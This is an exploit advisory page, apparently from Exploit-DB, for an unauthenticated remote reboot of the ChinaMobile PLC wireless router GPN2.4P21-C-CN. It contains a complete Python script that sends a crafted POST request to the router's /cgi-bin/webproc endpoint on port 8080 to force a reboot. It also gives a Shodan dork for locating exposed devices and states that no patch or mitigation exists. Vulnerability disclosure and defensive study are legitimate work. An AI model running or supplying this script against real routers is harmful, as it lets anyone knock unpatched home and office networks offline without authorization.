PLC Wireless Router GPN2.4P21-C-CN Unauthenticated Remote Reboot

vendor:

GPN2.4P21-C-CN

by:

Chris Rose

N/A

CVSS

N/A

Unauthenticated Remote Reboot

Unknown

CWE

Product Name: GPN2.4P21-C-CN

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested: Debian Linux

2018

PLC Wireless Router GPN2.4P21-C-CN Unauthenticated Remote Reboot

PLC Wireless Router's are vulnerable to a unauthenticated remote reboot which can be achieved through sending a modified http request. The script below will take a user supplied IP address of a PLC router and send the exploit to the device. Use the Shodan dork above to find PLC wireless routers.

Mitigation:

Unknown

Source

Exploit-DB raw data:

# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Unauthenticated Remote Reboot
# Date: 8/12/2018
# Exploit Author: Chris Rose
# Affected Model : GPN2.4P21-C-CN(Firmware: W2001EN-00)
# Vendor: ChinaMobile
# Tested on: Debian Linux
# Shodan dork- title:PLC 
# CVE: None
#Description: PLC Wireless Router's are vulnerable to a unauthenticated remote reboot
# which can be achieved through sending a modified http request. The script below will
# take a user suppled IP address of a PLC router and send the exploit to the device.# Use the Shodan dork above to find PLC wireless routers.

import requests
import time



target = raw_input("Enter target IP: ")
post_data = {'reboot' : 'Reboot', 'obj-action' : 'reboot', 'var%3Anoredirect' : '1', 'var%3Amenu' : 'maintenance', 'var%3Apage' : 'system', 'var%3Aerrorpage' : 'system', 'getpage' : 'html%2Fpage%2Frestarting.html'}
exploit = requests.post("http://"+target+":8080/cgi-bin/webproc", data=post_data)

print ("Sent exploit attempt to %s")% target
time.sleep(1.2)
print ("Test if device is offline.")
time.sleep(1.5)
print ("Visit http://"+target+":8080/")